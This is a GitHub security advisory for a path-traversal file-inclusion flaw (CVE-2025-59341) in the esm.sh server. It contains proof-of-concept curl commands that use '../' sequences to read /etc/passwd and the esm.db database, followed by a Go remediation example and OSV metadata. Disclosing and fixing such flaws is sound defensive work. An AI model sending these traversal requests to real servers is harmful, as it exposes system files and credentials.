ghsa-49pv-gwxp-532r
Vulnerability from github
Published: 2025-09-17 18:39
Modified: 2025-09-26 16:14
Summary: esm.sh has File Inclusion issue
Details

Summary

A Local File Inclusion (LFI) issue was identified in the esm.sh service URL handling. An attacker could craft a request that causes the server to read and return files from the host filesystem (or other unintended file sources).

Severity: High — LFI can expose secrets, configuration files, credentials, or enable further compromise.
Impact: reading configuration files, private keys, environment files, or other sensitive files; disclosure of secrets or credentials; information leakage that could enable further attacks.

Vulnerable code snippet is in this file: https://github.com/esm-dev/esm.sh/blob/c62f191d32639314ff0525d1c3c0e19ea2b16143/server/router.go#L1168


Proof of Concept

  1. Using this default config file that I copied from the repo, the server is running at `http://localhost:9999` with this command: `go run server/esmd/main.go --config=config.json`

```json
{
  "port": 9999,
  "npmRegistry": "https://registry.npmjs.org/",
  "npmToken": "******"
}
```

  2. Trigger the LFI vulnerability by sending the command below to read a local file

```bash
# read /etc/passwd
curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../../../../etc/passwd?raw=1&module=1'

# or read the database esm.db file
curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../esm.db?raw=1&module=1'
```

[image: poc-image]


Remediation

Simply remove any `..` segments from the URL path before actually processing the file. See more details in this guide: https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html
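As an added example (not code from the esm.sh project, the fix commit, or this advisory), the following Go program shows the containment check that the remediation above is aiming for, done on the canonical form of the path rather than by deleting `..` from the string: the request path is joined to a storage root, which also cleans it, and the result is accepted only if it still lies under that root. It goes one step beyond the one-line remediation on purpose, because a single literal strip only sees the raw string, whereas comparing the cleaned result against the root rejects every path that ends up outside it, whatever it looked like before cleaning. The `hasDotDot` helper is the literal check the advisory describes, shown alongside for comparison. The root `/srv/esm` and the ordinary module paths are constructed for the demonstration; the two traversal paths are the ones used in the proof of concept.

```go
package main

import (
	"errors"
	"fmt"
	"path"
	"strings"
)

// ErrTraversal is returned when a request path would resolve outside the root.
var ErrTraversal = errors.New("path traversal rejected")

// resolveUnderRoot maps an already-decoded URL path (what net/http exposes as
// r.URL.Path) onto a location under root. path.Join cleans the joined path, so
// "." and ".." segments are collapsed first; the containment check therefore
// runs on the canonical path, not on the raw request string.
func resolveUnderRoot(root, urlPath string) (string, error) {
	root = path.Clean(root)
	full := path.Join(root, urlPath)
	// root itself is allowed; anything else must start with root plus a
	// separator, so a sibling such as "/srv/esm2" is not mistaken for "/srv/esm".
	if full != root && !strings.HasPrefix(full, root+"/") {
		return "", ErrTraversal
	}
	return full, nil
}

// hasDotDot reports whether the raw path contains a ".." segment. This is the
// literal check the advisory's remediation describes; it looks at the string
// only, so it is shown here for comparison rather than as the sole defence.
func hasDotDot(urlPath string) bool {
	for _, seg := range strings.Split(urlPath, "/") {
		if seg == ".." {
			return true
		}
	}
	return false
}

func main() {
	const root = "/srv/esm" // hypothetical storage root for the demo
	// Constructed sample requests: two ordinary module paths followed by the
	// two traversal paths from the advisory's proof of concept.
	requests := []string{
		"/pr/x/y@99/index.js",
		"/pr/x/y@99/dist/index.mjs",
		"/pr/x/y@99/../../../../../../../../../../etc/passwd",
		"/pr/x/y@99/../../../../../../../esm.db",
	}
	for _, p := range requests {
		full, err := resolveUnderRoot(root, p)
		if err != nil {
			fmt.Printf("REJECT %-52s (%v, dotdot=%t)\n", p, err, hasDotDot(p))
			continue
		}
		fmt.Printf("serve  %-52s -> %s\n", p, full)
	}
}
```

Both proof-of-concept paths clean to `/etc/passwd` and `/esm.db`, which fail the root prefix test, while the ordinary requests resolve to files under `/srv/esm`. A handler would call `resolveUnderRoot` once and return 400 or 404 on `ErrTraversal` before touching the filesystem.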

Credits

  • Ai Ho (Jessie): https://github.com/j3ssie
  • CL Yang: https://github.com/A11riseforme


{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/esm-dev/esm.sh"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "136"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-59341"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-23"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-17T18:39:20Z",
    "nvd_published_at": "2025-09-17T18:15:53Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nA Local File Inclusion (LFI) issue was identified in the esm.sh service URL handling. An attacker could craft a request that causes the server to read and return files from the host filesystem (or other unintended file sources).\n\n**Severity:** High \u2014 LFI can expose secrets, configuration files, credentials, or enable further compromise.\n**Impact:** reading configuration files, private keys, environment files, or other sensitive files; disclosure of secrets or credentials; information leakage that could enable further attacks.\n\nVulnerable code snippet is in this file: https://github.com/esm-dev/esm.sh/blob/c62f191d32639314ff0525d1c3c0e19ea2b16143/server/router.go#L1168\n\n---\n\n## Proof of Concept\n\n1. Using this default config file that I copy from the repo, the server is running at  `http://localhost:9999` with this command `go run server/esmd/main.go --config=config.json`\n\n\n```json\n{\n  \"port\": 9999,\n  \"npmRegistry\": \"https://registry.npmjs.org/\",\n  \"npmToken\": \"******\"\n}\n\n```\n\n2. Trigger the LFI vulnerability by sending this command below to read a local file\n\n```bash\n# read /etc/passwd\ncurl --path-as-is \u0027http://localhost:9999/pr/x/y@99/../../../../../../../../../../etc/passwd?raw=1\u0026module=1\u0027\n\n# or read the database esm.db file\ncurl --path-as-is \u0027http://localhost:9999/pr/x/y@99/../../../../../../../esm.db?raw=1\u0026module=1\u0027\n```\n\n\u003cimg width=\"3338\" height=\"1906\" alt=\"poc-image\" src=\"https://github.com/user-attachments/assets/f3721e5d-a09c-4227-960a-35279ff52811\" /\u003e\n\n\n---\n\n## Remediation\n\nSimply remove any `..` in the URL path before actually process the file. See more details in [this guide](https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html)\n\n## Credits\n\n- [Ai Ho (Jessie)](https://github.com/j3ssie)\n- [CL Yang](https://github.com/A11riseforme)",
  "id": "GHSA-49pv-gwxp-532r",
  "modified": "2025-09-26T16:14:27Z",
  "published": "2025-09-17T18:39:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/esm-dev/esm.sh/security/advisories/GHSA-49pv-gwxp-532r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59341"
    },
    {
      "type": "WEB",
      "url": "https://github.com/esm-dev/esm.sh/commit/492de92850dd4d350c8b299af541f87541e58a45"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/esm-dev/esm.sh"
    },
    {
      "type": "WEB",
      "url": "https://github.com/esm-dev/esm.sh/blob/c62f191d32639314ff0525d1c3c0e19ea2b16143/server/router.go#L1168"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2025-3962"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "esm.sh has File Inclusion issue"
}

